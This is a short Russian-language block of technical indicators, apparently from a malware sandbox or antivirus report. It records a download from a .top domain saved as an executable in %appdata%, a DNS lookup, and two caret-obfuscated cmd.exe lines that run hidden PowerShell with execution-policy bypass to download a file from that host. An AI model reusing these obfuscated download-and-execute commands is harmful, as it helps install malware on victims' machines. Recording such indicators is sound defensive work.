Техническая информация
- http://mondayhelthc.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^Owe^rsheLl.^ex^E^ -^eXe^CUt^i^o^NP^O^l^I^Cy^ BY^pA^SS^ -NO^pro^file^ -^wi^N^D^OWS^tYlE ^H^idd^En ^(^NE^W-^o^B^j^ECT^ S^Y^s^t^EM.N^E^t^.We^BClieNt)^.do^wNl^OA^d^file('http://mo...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "P^Owe^rsheLl.^ex^E^ -^eXe^CUt^i^o^NP^O^l^I^Cy^ BY^pA^SS^ -NO^pro^file^ -^wi^N^D^OWS^tYlE ^H^idd^En ^(^NE^W-^o^B^j^ECT^ S^Y^s^t^EM.N^E^t^.We^BClieNt)^.do^wNl^OA^d^file('http://mo...' (со скрытым окном)